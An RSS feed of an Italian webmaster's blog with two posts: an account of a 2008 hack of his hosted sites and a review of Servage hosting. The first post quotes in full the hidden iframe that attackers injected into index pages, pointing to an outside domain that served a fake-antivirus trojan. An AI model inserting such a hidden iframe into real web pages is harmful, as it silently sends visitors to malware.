<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" >

<channel>
	<title>Simone Chiaromonte &#187; hosting</title>
	<atom:link href="http://simone.chiaromonte.com/tag/hosting/feed/" rel="self" type="application/rss+xml" />
	<link>http://simone.chiaromonte.com</link>
	<description>Solo un altro SEO, SEM, DEM e Webmaster Freelance a Bologna e Ascoli Piceno</description>
	<lastBuildDate>Tue, 17 Jan 2012 09:39:55 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Il regalo di Natale degli Hacker</title>
		<link>http://simone.chiaromonte.com/internet/regalo-natale-hacker/</link>
		<comments>http://simone.chiaromonte.com/internet/regalo-natale-hacker/#comments</comments>
		<pubDate>Sun, 28 Dec 2008 13:32:15 +0000</pubDate>
		<dc:creator>Simone Chiaromonte</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[antivirus]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[hosting]]></category>
		<category><![CDATA[sicurezza]]></category>

		<guid isPermaLink="false">http://simone.chiaromonte.com/?p=411</guid>
		<description><![CDATA[E che volete farci! Ci sono e in qualche modo bisogna conviverci: scrivo questo post un po&#8217; in ritardo ma il 26 Dicembre, grazie alla segnalazione di Paolo (quando metti su il blog avvisami), un mio lettore, mi sono effettivamente accorto che il mio sito e moltissimi altri nel mio hosting hanno subito un attacco [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-413" title="hacker siti web" src="http://simone.chiaromonte.com/wp-content/uploads/hacker-siti.jpg" alt="hacker siti web" width="127" height="95" />E che volete farci! Ci sono e in qualche modo bisogna conviverci: scrivo questo post un po&#8217; in ritardo ma il 26 Dicembre, grazie alla segnalazione di Paolo (quando metti su il blog avvisami), un mio lettore, mi sono effettivamente accorto che il mio sito e moltissimi altri nel <a title="Servage Hosting" href="http://simone.chiaromonte.com/internet/pregi-difetti-servage-hosting/">mio hosting</a> hanno <strong>subito un attacco hacker</strong>.</p>
<p>Praticamente, probabilmente <em>sfruttando le debolezze dell&#8217;hosting</em> oppure utilizzando le mie credenziali di accesso via FTP (cosa che mi sembra molto improbabile), è riuscito a <strong>modificare tutte le pagine index</strong> (sia <em>html</em> che <em>php</em>) di tutti i miei siti web inserendo il seguente iframe:</p>
<blockquote><p>&lt;iframe src=&#8221;http://thedeadpit.com/?click=xxxxxx&#8221; width=1 height=1 style=&#8221;visibility:hidden position:absolute&#8221;&gt;</p></blockquote>
<p>e un codice che ora ho cancellato che si collegava a <a title="Whois di Google-stats.com" href="http://whois.domaintools.com/google-stats.com" target="_blank">google-stats.com</a> e forniva (probabilmente) tutte le informazioni dei visitatori ai miei siti, ma che non ha nulla a che fare con google! Infatti se provate a collegarvi a quel sito si vieni subito dirottati a Google.it! Incredibile!</p>
<p><strong>L&#8217;iframe invece chiudeva il browser</strong> e generava un messaggio di errore nel quale si consigliava di istallare un antivirus (pensa un po&#8217; che bell&#8217;antivirus poteva essere) cliccando su OK. Mi hanno segnalato che <a title="Download di Avast Antivirus" href="http://www.avast.com/ita/download-avast-home.html" target="_blank">Avast Antivirus</a> lo segnalava come Trojan, ma per noi che <a title="utilizzo di applicazioni per linux" href="http://simone.chiaromonte.com/blog/ubuntu/">utilizziamo linux</a> non abbiamo questo problema! :-)</p>
<p>Morale: ho dovuto <strong>controllare e modificare i file index.php</strong> (anche quelli che finivano con index es. BoardIndex.php) di tutti i miei siti web, e modificare anche le credenziali di accesso! Non so dire con esattezza quale possa essere stata la <a title="Ulteriori informazioni sull'attacco Hacker" href="http://forums.digitalpoint.com/showthread.php?t=1151323" target="_blank">causa di questo problema</a>; il supporto del mio hosting servage mi risponde così:</p>
<blockquote><p><span style="font-family: Verdana; font-size: x-small;"><span style="font-family: Verdana; font-size: x-small;">Our servers are secured. Most of attackers use an upload script that allows visitors of the website to upload files. Please change your account password and check that no folders have insecure permissions such as 777 (unlimited access).</span></span></p></blockquote>
<p>Però le cartelle dei siti web avevano i permessi 755, il che significa che solo il proprietario ha i permessi di scrittura, per questo ho supposto che l&#8217;hacker ha probabilmente sfruttato le debolezze del server o ha &#8220;sgamato&#8221; la mia user e pass dell&#8217;FTP&#8230; ma non ci credo a quest&#8217;ultima ipotesi ;-)</p>
]]></content:encoded>
			<wfw:commentRss>http://simone.chiaromonte.com/internet/regalo-natale-hacker/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Pregi e Difetti di Servage Hosting</title>
		<link>http://simone.chiaromonte.com/internet/pregi-difetti-servage-hosting/</link>
		<comments>http://simone.chiaromonte.com/internet/pregi-difetti-servage-hosting/#comments</comments>
		<pubDate>Sat, 18 Oct 2008 22:03:00 +0000</pubDate>
		<dc:creator>Simone Chiaromonte</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[cms]]></category>
		<category><![CDATA[hosting]]></category>
		<category><![CDATA[siti web]]></category>

		<guid isPermaLink="false">http://simone.chiaromonte.com/?p=256</guid>
		<description><![CDATA[Dopo più di tre anni che utilizzo Servage come hosting per i miei siti web, oggi mi sento in dovere di parlare un po&#8217; dei suoi pregi e difetti! Non posso essere cattivo, ma nemmeno troppo buono considerando le lunghe discussioni (pacifiche) avute con il supporto in inglese! Che è uno degli hosting più convenienti [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-260" title="pregi difetti servage" src="http://simone.chiaromonte.com/wp-content/uploads/pregi-difetti-servage-hosting1.gif" alt="" width="200" height="50" />Dopo più di tre anni che utilizzo <a title="Hosting Servage" href="http://www.servage.net/?coupon=cust20677" target="_blank">Servage</a> come hosting per i miei siti web, oggi mi sento in dovere di parlare un po&#8217; dei <strong>suoi pregi e difetti!</strong> Non posso essere cattivo, ma nemmeno troppo buono considerando le lunghe discussioni (pacifiche) avute con il supporto in inglese!</p>
<p>Che è uno degli <strong>hosting più convenienti in assoluto</strong> non c&#8217;è ombra di dubbio, e il fatto che i loro <em>server risiedano in Germania</em> è un punto a loro favore se per noi è importante un basso tempo di delay per la visualizzazioni dei nostri siti. Ultimamente però le connessioni ai database creati su Servage hanno un ritardo così esagerato che è davvero estenuante navigare sui siti da lui hostati! Per non parlare dei tempi interminabili che si aspettano per inserire un nuovo articolo con un <a href="http://simone.chiaromonte.com/wordpress/come-aggiornare-wordpress-26/">CMS come WordPress!</a> Capisco che è un&#8217;hosting molto apprezzato ma così le bestemmie volano!</p>
<p>Prendendo come esempio un <a title="Il mio sito è creato con WP" href="http://simone.chiaromonte.com/">sito sviluppato con WP</a> appunto, ogni volta che si accede alla homepage il <a title="CMS wordpress" href="http://wordpress.org" target="_blank">CMS</a> effettua l&#8217;accesso al Database e con una serie di richieste visualizza i contenuti del sito stesso! Normale direte! Ma non diventa più normale quando per accedere al DB ci impiega, in molti casi, anche 20 secondi! Non è concepibile nè per noi sviluppatori nè per i visitatori stessi! Fortunatamente ho risolto il problema con un <a title="plugin per WP per velocizzare il sito" href="http://simone.chiaromonte.com/wordpress/wp-super-cache-blog-velocissimo/" target="_blank">plugin per WP di nome Wp Super Cache</a>! Ma se avessi messo a punto un bellissimo <a title="Ecommerce fantastico!" href="http://www.magentocommerce.com/" target="_blank">E-commerce come Magento</a> su un <strong>hosting Servage?</strong> Quante bestemmie avremmo detto noi quando dovevamo inserire un nuovo prodotto e aspettare 30 secondi solo per l&#8217;accesso al DB? E quante ancora ne avrebbero dette i visitatori soprattutto al momento del pagamento?</p>
<p>Ebbene, molte cose ho capito di <a title="Hosting Servage" href="http://www.servage.net/?coupon=cust20677" target="_blank">Servage Hosting</a>, e sento il dovere di diffondere nel mio blog <em>i pregi e i difetti</em>.</p>
<h2>Pregi di Servage:</h2>
<ul>
<li>Economico: soltanto 80 euro l&#8217;anno (circa)</li>
<li>Ricchissimo di funzionalità e pieno controllo del server come un VPS.</li>
<li>Possibilità di attivare e disattivare funzioni del php.ini</li>
<li>Mod Rewrite attivo (determinante per le attività SEO)</li>
<li>Possibilità di hostare più di 25 domini</li>
<li>Gestione DNS completa (puoi comprare i domini altrove e dirottarli li)</li>
<li>Infinite caselle email ed ftp account</li>
<li>1000 Database disponibili per ogni account</li>
<li>Più di 510 Gb di spazio e 5 Terabyte di traffico mensile consentito</li>
<li>Possibilità di creare infiniti domini di terzo livello (http://sub.domain.com)</li>
<li>Supporto tecninco attivo 24 ore su 24 (rispondono anche dopo 2 minuti)</li>
</ul>
<h2>Difetti di Servage:</h2>
<ul>
<li>Database spesso troppo, troppo, troppo lento da accederci</li>
<li>Alcune restrizioni lato server (che non riesco a spiegarvi in 2 righe)</li>
<li>Impossibilità di istallarci un e-commerce causa eccessiva lentezza DB</li>
</ul>
<p>Come vedete <strong>i pregi sono nettamente maggiori</strong>, ma per quanto mi riguarda il fatto che sia troppo lento ad acceddere ai DB ne moltiplica per 1000 i difetti! Lo consiglio a patto che non vogliate installarci un ecommerce e che il vostro CMS disponga di un plugin per creare una cache delle pagine in html; il che risolverebbe il problema dei ritardi di accesso al DB.</p>
]]></content:encoded>
			<wfw:commentRss>http://simone.chiaromonte.com/internet/pregi-difetti-servage-hosting/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
	</channel>
</rss>

